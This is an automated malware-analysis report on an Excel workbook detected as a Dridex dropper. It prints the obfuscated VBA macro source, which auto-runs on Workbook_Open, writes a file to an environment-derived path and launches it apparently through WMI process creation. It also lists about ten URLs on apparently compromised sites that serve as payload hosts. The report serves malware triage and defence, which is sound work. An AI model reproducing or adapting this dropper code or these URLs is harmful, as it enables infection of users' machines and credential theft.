MALICIOUS
240
Risk Score
Heuristics 8
-
ClamAV: Doc.Dropper.Dridex-9845759-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Dridex-9845759-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set YXZO3CyE = GetObject(RNUq81jrJqOHiGX).SpawnInstance_ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
ltQfi_BaJr_c20 = Environ(ZJ6HNKKpEoCi.GRReRYmq(Y8Qr_wS7R)) -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://slasinfo.com/wp-content/plugins/better-wp-security/core/Z3w9lRfmiUeqn.php In document text (OOXML body / shared strings)
- https://dentaldesignstudiowi.com/wp-content/uploads/2021/01/9eFsntMZ.phpIn document text (OOXML body / shared strings)
- https://elkytoursandtravel.com/wp-includes/SimplePie/Decode/HTML/i06d5d4XcypWc.phpIn document text (OOXML body / shared strings)
- https://mishpachton.club/wp-content/uploads/2020/01/sULnmh1mel6Ha.phpIn document text (OOXML body / shared strings)
- https://nationalngofederation.com/wp-includes/SimplePie/Decode/HTML/CQiRG6YtYGt.phpIn document text (OOXML body / shared strings)
- https://www.evrocom.co.za/images/pagebuilder/testimonials/120x120/ww2aIKCx8.phpIn document text (OOXML body / shared strings)
- https://drakarys.rs/img/icons/tabs/xTPpiyC3.phpIn document text (OOXML body / shared strings)
- https://elearn.empoweredmw.com/lib/minify/matthiasmullie-minify/data/WD3Uawo4EEZ.phpIn document text (OOXML body / shared strings)
- https://one2onematch.net/back_up/under/fonts/Montserrat/kDCn9x8aeY8jz.phpIn document text (OOXML body / shared strings)
- https://tarifacabins.com/wp-includes/js/mediaelement/renderers/KcsChOSuEV.phpIn document text (OOXML body / shared strings)
- http://www.w3.org/1999/XSL/TransformIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12371 bytes |
SHA-256: 74206c166dfc327f4016982b34a6bfb296ecf7b1c7946cf9a260f859a126a91d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
199 of 361 identifiers look randomly generated (e.g. 'xlCylinderBarStacked100') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
GfcIBj3FsfxLGoGq = Array("ADiLp_IbPB_J8I IiJY_0vB", rnliu_w91x_75G_Hsn & "WLD59nN3srC D1OOCEXrVlwj" & wb2Gi_32q2, "UZlFXreyGiF" & Ov1DllcPb8GOSVzH, "G4gg_xDP_limR_xIE")
rSDJi_qAZ = InStr(GegijecBc, GCIf_Ds0, TsZnhFR5whmroBZq)
MHwp6_QNvw_qQs = WLQ1y_Q9xw_Be6H_ZrR.gwE8KJmc
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "WLQ1y_Q9xw_Be6H_ZrR"
Function gwE8KJmc()
AugxO_Pb3_geT = Len(Join(Array("iJHM_Qss Onrv_HFle kbuz_0T4_UV09_J8yB" & M7Kl_NuL_rDx_U7q, QfMXz_wN33_Iq3N, "K0whn_q5pr d0VUI_jZ1J_4zz_hHXl txyjAoW" + "HZ4boFrPaHplyO", mThM9fLaI + XwP7_LM1_jSzS_uSG, SdpWk_v9Ml_WVw - ZylLgPM & "F2drU_nnY_FmdK_pQ4 KGWs_7qgQ_D9h0 giCJIRbZLa70")))
Dim QcQbt_0veS_bDL5 As String
KljUgPZG = IsDate(CLng((838 And 815)))
QcQbt_0veS_bDL5 = M9o5I9FfqzptF9ylI.qUoERGoP6SPWSf.Text
FjFD_lZV_21q_Re6 = Gwwze463 & ltQfi_BaJr_c20 & Ce5WAPQQ & ZJ6HNKKpEoCi.NrgPYlQqg6by & nVf69sIR & OHCWZ_yMS_CTr4 & Bjtq33OMQvt & u0DQS_n1W & M9o5I9FfqzptF9ylI.eEEBxYGBQu0o0(B3hkT_i3q_K7z7_sTf) & G0fy_uSM_VlQ_jqT & XIf0_vg3_I4E & Kiag_sIy_6Ii0_U7kT.zC6f0jr(QJpi2_CAf)
For ZqIN_wdd_kUX0 = 0 To CLng(((0.536015896671634 * 2013) + xlDialogAppMove))
YDQj_Cgp_2O1_53fG = ZqIN_wdd_kUX0
Next ZqIN_wdd_kUX0
Open FjFD_lZV_21q_Re6 For Binary As #CLng((Not (-781 + (1266 - 487#))))
Put #CLng(((-931 - (-1496 - -565.002169197397)) * -461)), , QcQbt_0veS_bDL5
zyU6vEOzqdHf8 = Split(uJ57F_y0pJ_7OQw, nP00EkX, bXCOtlB0)
Close #CLng((Not ((xlDialogSetBackgroundPicture - 509.003344481605) * 598)))
PAj0GIDsOrQEYtw = FIMEC_5aup(ZMXOnHZs.Q0IY_TyF_877_D8ul, WLQ1y_Q9xw_Be6H_ZrR.MtLfx_uIY_juwR_08sb(SwTJmNzMYBexBYH) & FjFD_lZV_21q_Re6 & Chr(34), YXZO3CyE(Kiag_sIy_6Ii0_U7kT.hJWKdCLQnBYa(kudVD_cev1_20TP_iIJ)))
End Function
Function YXZO3CyE(RNUq81jrJqOHiGX)
Set YXZO3CyE = GetObject(RNUq81jrJqOHiGX).SpawnInstance_
'mDkR_2zk_c4H A2YJ_eC0_Z2kL M4MikUA0WsQJQ DsN82_LXw_PbKC_uAIE DIPq_wYNk_0D5_ciuI DefGa05HbEh ECTUqs2 E1kfC_6Z4_0H4_0hb bLIcU_Ff0_ZjHW_KXd
WFssb_XzEI_KF3x = Weekday(PWIgmqW1t)
YXZO3CyE.ShowWindow = CLng(((0.157749077490775 * 1084) - (-127 - -286#)))
Trp6WZJR0UmO = Replace(AcGIdgW8, jGNOinFL6, ziHyRa2xoZOOZt)
Mlz3MaoExDbc2Qx = Join(Array("Y4CVEXKswRTGZGcp zhm7Mu6IKGMXDZs MudJARyC4JpCR9H" & "Ufz0J_8p0_5Xx_HzbS", JLBrE1kR - Bsgt_zkNu & "Eezg6xc2 GeHmytbMrdW5MANT TMl8L4w59Sg", "X61k_J4jW vyc9wXfQ FBQ7hYsDmyz" & aveY_tQV, IGvS_6r7B + lELFE_VwP5, "herfkMT q0k45yaw IfBjh0MMGcJ3ysk", "Tzuh_v5z" & "xAocKm6A0oq2bT Dxl0_oJV iRdZ_dz1" + "Y8cm87f9asdu"))
IwO1xKBQsHRdCqKA9 = InStr(CENlcbTYKttF, FMpXE_H4Vk_bLG_iBPd, cGwNJ1Gp)
L3jN5lq10 = Array(SdnvE_K9I_t0f, MmVlKa42, "aKpFi_0rq_ugFR Tt0kM4JrWqP0gfGs N2dH4AAm")
End Function
Function ltQfi_BaJr_c20()
a76jZyrxqub9Uo = Split(KcrTx0qR684, KDZe_sZjp_Hwq_iSFY, K0021_pmD_Rjt)
QER9DTT = Abs(CLng((0.320580474934037 * (1.56611570247934 * -484))))
Oci0qjOApk3 = InStr(XVG65OBJ, HhjnP3TZ02NqVzx, Rq3hC_3FU_1qt7_1UY)
For dIUrlTp0X4TcPH = 0 To CLng((0.597426470588235 * 2176))
N7vD_BugG_Dpq_0LW4 = dIUrlTp0X4TcPH
Next dIUrlTp0X4TcPH
ltQfi_BaJr_c20 = Environ(ZJ6HNKKpEoCi.GRReRYmq(Y8Qr_wS7R))
UhTd_WEch_rRw = Split(Xuynu_5ZI_fFW, vpc4LLzUYr0oJKxI, b5CsS97jBhlh)
UnR50_3gAu_xpeT = Array(KLh0_iU7r & "ZeLKv0PpHK3", "O1CMScNQ" & "KvmY_LTw_m0c_9SuI" & "fQtQnhEjWG2a e3qG8JaZE60k", J5XfeVfGOtX0uAZL, M12pGdf97Sk - t0C3F_1gus_FfI)
GGPtN_eLZI = Split(ZlbATtG, lhG5aDyrkKMEm, Zukh0_sTtP_vXm)
OL7M62pXDjKVk4h = Abs(CLng((1019 And (1260 - 271#))))
End Function
Function FIMEC_5aup(V2QwvcUB, rJ2ju_fBM, K21EVPRq7eZb)
HBxoU4AemZAjG7Qu = Split(Cn8y_vyGR_fPWT_ZbcW, DgXYM_qZx_Xe3, GllY_bLd_pIh)
QnhtFP8jwZr6AmHH = Weekday(fe5c_RNU_Xyi)
MvpND_sIHF_jHw_yI4Z = tkoT_M6D_87fU_kkmk
YqDpG_FlyR_xLy = Split(gzEoO_H7Di_FYh_uzR, VpiY1_xCGR, WSfcC8EE8pnE)
With GetObject(V2QwvcUB)
.Create rJ2ju_fBM, Null, K21EVPRq7eZb
End With
BptecBekrLfz = Join(Array(sY0cVjwG5f9y & "MxyJtTMjpn4l" & gdqRxQ6AZRgvXj, xJvmQ1OvLrH * sBHwICbqhwlfE & hYYkc_CofU, Vgwp7_B7tJ_UIL, G1WV2QuDciQaB ^ JfJd_EQe_bg2n_ZPuF, "CWnTfSZ8T JQ4pve8wggJn Nd0v_m9Bg_jHK", "ppW8F_HsBc qYoIC5Z8P7" & "Wr17f0x IULnywWCq JQ92Z_ezF" & KhDmyJ673gIb, YnH2_1OU + OzvI_Kym_M0X_0oiV))
I4o412E1pkRj = CLng((xlCenterAcrossSelection And xlSourceChart)) < CLng((702 And 1017))
T8WOydOaYQuG = Replace(CHMi08rXprkJ8Te, PPY9_IT0_t0ls, VjpWG_QRYX)
iueJwuwOQOW3w = InStr(ScXgrvj, YJoq9_WSF, v1S7_FjUY_Z0d8)
End Function
Function MtLfx_uIY_juwR_08sb(JQsW_PvN_L7Mp)
MtLfx_uIY_juwR_08sb = ChrW(CLng((0.146913580246914 * 810))) _
& Chr(CLng(((xlDialogVbaProcedureDefinition + 71#) - 292))) _
& ChrW(CLng((125 And (-0.214 * -500)))) _
& Chr(CLng((Asc("c")))) _
& ChrW(CLng((360 + -328))) & Chr(CLng((-0.198568872987478 * -559))) & Chr(CLng((Not (291 + -407#)))) & ChrW(CLng((((-147 + -135#) + 318#) And 49))) & ChrW(CLng((xlPieExploded Or xlConeBarClustered))) & ChrW(CLng(((-600 - -600.110624315444) * 913))) & Chr(CLng((Not (0.119631901840491 * (0.837328767123288 * -1168))))) & Chr(CLng((-871 + 903))) & ChrW(CLng((xlScale Or xlDialogStyle))) _
& Chr(CLng((Not ((1094 - 336#) - 861#)))) _
& Chr(CLng((AscW("o")))) _
& Chr(CLng(((-978 + 977.859778597786) * -813))) _
& Chr(CLng(((0.111909650924025 * 974) Or xlPyramidBarClustered))) & ChrW(CLng(((823 + -726#) Or xlLineMarkers))) & Chr(CLng((AscW("t")))) & ChrW(CLng((AscW(":")))) & ChrW(CLng((xlNonEnglishFunctions Or xlOpen)))
sI1tb_S3uO_Cow = Year(W9DkC_aNX)
End Function
Attribute VB_Name = "ZJ6HNKKpEoCi"
Function NrgPYlQqg6by()
NrgPYlQqg6by = Join(Array(ChrW(CLng((Not -93)))))
Ar3YRkPdeWU1Fxuf = NxNY_lSl_ICES_9C0
'ZGsz0_zRv C6gw_oQLJ_pmO_MOE r7yBj_bFLn_Edd_qvP UojR_Uj2_qQrS NgIk5_dVXY V4ZFd_O07_NL1_DjP QGFRN_3yp4_S3O0_UJ6 ViP4EfEB dqT3_YM9j_gbO
End Function
Function GRReRYmq(KqRq_NUYO_H22H_GeTj)
GRReRYmq = Join(Array(Chr(CLng((Not ((453 - 724#) - -173#)))) _
& Chr(CLng((Not -113))) & ChrW(CLng((-0.273838630806846 * ((-1.67334915309713E-03 * 484) * xlDialogChartOptionsDataLabels)))) _
& ChrW(CLng((xlDialogCopyPicture And xlConeColStacked100))) _
& ChrW(CLng((xlAreaStacked100 Xor ((-0.856287425149701 * 334) + 330#)))) _
& ChrW(CLng((0.242171189979123 * (-467 - -946#)))) _
& Chr(CLng((xlLineStacked100 Or xlCylinderBarStacked100))) _
))
End Function
Attribute VB_Name = "M9o5I9FfqzptF9ylI"
Attribute VB_Base = "0{BF83CFBE-9A4F-4C4D-95E8-B99A15391736}{758CE4CB-1FC2-44CF-ACDB-7C90A499A36C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function eEEBxYGBQu0o0(Rid0buWWCp840Do)
BLqfZvk0fg04SbrO = Array("NmkiT_in9_qMF9" + "LlEup_0CF U6SepSSs9wMuyM D2a60HvFD3mLK" & "TC7MP_t2fX_9dAj_mp65 AEmD_hid_oKKA", WIxAs7cq8V, "YbnwY_w6T_QP52_5alU" + "dj9weXepl KcjkkrCBurZwnT4P", "tJuL_rwA r8kpc_qr4" & T3WVY_T5p_6Lf, OqzMm_QBcI)
ZIXP0_6RXH_Mfmb = Year(Q3hDuCnejwSV)
VrUNeck5 = XEho_auj_eNIB
kRDFQ_IFK_HRh = InStr(zHkL1_g8e_34X3_DhLl, HhvDYMJNAYLTzK, RlUnecKe)
eEEBxYGBQu0o0 = Hex(CLng((CLng((43344 + (-2.58024691358025 * -243))) - CLng((27622 And 26863)) + CLng((Not -26855))) * Rnd + CLng(((0.996912923142431 * 28182) Xor (xlDialogConditionalFormatting - -786#)))))
NTqEoIYhX2zFAi = Abs(CLng(((xlDialogCreateList + 443#) Or 1088)))
gqOM_UjGX = "sQiJa_50e_F8MC_vJHv"
QFR0z_bfAj_Fk7M = Split(H0m3_cuE_s7mj_XMAK, VIB0ilIbf, DwTmc_wIDG)
'PiYYX_8slo_w9ur_RccH TIh0_Xgmn nHvt_yQM7_kNZp_gY0 efP8N_EBS1_g3o_kpzR oub0BgD NtEMxd53E
XNguFKoo = Array("h3U8_w22_FIOO NHAjHcEKGLNpl" & "SEgu_i6O_UEC O1V8wzk" & "uWtsS0UjBycSsn", JeAD_0Nyy * XdGA_SWT0_ImR & "V839M_0FtC_u4y ZzNeR_b1hS_pCTv_2miT RFnkbrf4x", cEFWsOyK0sgl0Z7X & "bH1Pd6ajiSl KxZczxAxj3OAEI", ZdSL_PXog * SHRr_mVR_ycj7 - HJcL_jsjz_x23_ux6S, UJPzBTt4Xkcm & "JXYqXt3aeo24")
EZuq_NYIp = Weekday(N54NEAtsltY1)
Glr1jJ2kJjDMYtBG = Abs(CLng((1028 - 726)))
MKM3PFWNX0K = IsDate(CLng(((-368 + 366.899653979239) * -289)))
End Function
Attribute VB_Name = "Kiag_sIy_6Ii0_U7kT"
Function zC6f0jr(Hdios_EQ0u_30R_x2k)
zC6f0jr = ChrW(CLng((Not -47))) + Chr(CLng((-774 - ((-771 - -765#) + -888#)))) _
+ Chr(CLng(((-365 + 722#) + -242))) _
+ Chr(CLng((xlAccounting1 Or (508 - 404#)))) _
N8oeZaJqz = Weekday(GgvMZ_gUP_Prao_VYd)
AYZAiIY = UPuR_xmp_yr3w
End Function
Function hJWKdCLQnBYa(jLpno_QOs)
hJWKdCLQnBYa = Join(Array(Chr(CLng(((-94 + (-0.251436781609195 * -696)) Or xlPaperFanfoldUS))) + ChrW(CLng((AscW("i")))) + Chr(CLng((126 And xlDialogDeleteFormat))) _
+ Chr(CLng((AscW("m")))) + Chr(CLng((xlRadarFilled + xlAxis))) + ChrW(CLng((Not -110))) _
+ ChrW(CLng((125 And (-0.143386897404203 * -809)))) + ChrW(CLng(((-1038 + 194#) + (3.31833910034602 * 289)))) + ChrW(CLng(((0.482008995502249 * -1334) - -701))) + Chr(CLng(((0.518035303146585 * (1.36297071129707 * -956)) + 767))) _
+ ChrW(CLng((AscW("r")))) _
+ Chr(CLng((Not -112))) + ChrW(CLng((((1831 - 306#) - 752#) + -662))) + Chr(CLng((AscW("t")))) + ChrW(CLng((-237 - -329))) + ChrW(CLng(((-461 - -460.815298507463) * -536))) + ChrW(CLng((xlRangeAutoFormatTable3 + ((xlThousands - -2.87925170068027) * -588)))) + ChrW(CLng((1014 - 905))) + Chr(CLng((0.229571984435798 * 514))) + ChrW(CLng(((604 + -603.759615384615) * xlDialogSaveNewObject))) + Chr(CLng((Asc(":")))) + ChrW(CLng((Asc("W")))) + Chr(CLng(((-18# * xlParamTypeBigInt) Xor (-446 - -497#)))) _
+ Chr(CLng((Not (-559 - -448#)))) + Chr(CLng((xlWQ1 Or (-139 + (0.139084507042254 * 1136))))) + Chr(CLng((Not (827 + -878#)))) + ChrW(CLng((xlMinuteCode Or xlDialogFormatText))) + ChrW(CLng(((-918 - -934#) Or xlLineStacked100))) + Chr(CLng(((121 - 36#) Xor xlPaperFanfoldUS))) + Chr(CLng(((-1212 - -522#) - (-1519 + 718#)))) + Chr(CLng((((0.485920104780616 * 1527) - 723#) Xor xlPyramidCol))) + Chr(CLng((Asc("e")))) + ChrW(CLng((123 And 115))) _
+ ChrW(CLng((173 + (-0.114624505928854 * xlDialogChartOptionsDataTable)))) + ChrW(CLng((489 + -406))) + Chr(CLng((Not (-1054 + (1211 - 274#))))) + Chr(CLng((Not (0.132791327913279 * -738)))) + ChrW(CLng((Asc("r")))) + ChrW(CLng((Asc("t")))) + ChrW(CLng((120 Xor xlSlantDashDot))) _
+ Chr(CLng((Not -113))) _
))
End Function
Attribute VB_Name = "ZMXOnHZs"
Function Q0IY_TyF_877_D8ul()
Q0IY_TyF_877_D8ul = Chr(CLng((Not (700 - 820#)))) + ChrW(CLng(((990 + -886#) Or xlWJ3FJ3))) + ChrW(CLng((-317 + 427))) _
+ Chr(CLng((Asc("m")))) + Chr(CLng((AscW("g")))) + ChrW(CLng((Not -110))) _
+ Chr(CLng((0.115422885572139 * (1669 - 664#)))) _
+ Chr(CLng((Asc("s")))) _
+ Chr(CLng((Asc(":")))) + ChrW(CLng((xlDialogAttachText + xlPaperEnvelopeB5))) + ChrW(CLng(((2.16666666666667 * (859 - 811#)) Or xlUpperCaseColumnLetter))) + Chr(CLng((((0.809233449477352 * 1148) + -418#) - 400))) + Chr(CLng(((3.35656889212971E-04 * (0.450883002207506 * 1812)) * xlDialogFormatCharttype))) + ChrW(CLng(((294 + (0.881578947368421 * -228)) And 124))) + Chr(CLng((Not -100))) + Chr(CLng((((xlDialogOpenMail - 950#) + 761.690265486726) * -339))) _
+ ChrW(CLng((0.11925601750547 * (0.539870053160071 * 1693)))) + Chr(CLng((xlCylinderCol Or xlPaperEnvelope12))) + Chr(CLng(((-829 + (0.467488789237668 * 892)) + xlDialogSeriesY))) + Chr(CLng((xlBarStacked100 And (6.59840728100114E-02 * 879)))) + Chr(CLng((xlBubble3DEffect And xlDialogRowHeight))) + ChrW(CLng((AscW("i")))) + ChrW(CLng((xlDialogSaveCopyAs - (-212 - -558#)))) + ChrW(CLng((AscW(xlEqual)))) + ChrW(CLng((Asc(xlValidAlertWarning)))) _
_
+ Chr(CLng((-237 - -332))) + ChrW(CLng((122 And ((411 - 410.920754716981) * 1060)))) + Chr(CLng((Not -115))) + ChrW(CLng((xlPyramidBarStacked100 And xlPyramidBarStacked100))) _
+ ChrW(CLng((AscW("c")))) + ChrW(CLng((xlPaperEnvelopeMonarch Xor xlDialogFormulaFind))) + Chr(CLng(((2.45464247598719E-02 * (1619 - 682#)) Xor xlConeColStacked))) + Chr(CLng((278 - 163))) _
End Function
Function Hbv0r_SJh4(EGK6dKAg)
Hbv0r_SJh4 = Join(Array(ChrW(CLng((Not -35))) _
))
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 57344 bytes |
SHA-256: 081d829dcc9cb3edd907144fb39144116f3db88d1651e043915b138eb6f2bc96 |
|||
|
Detection
ClamAV:
Doc.Dropper.Dridex-9845759-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.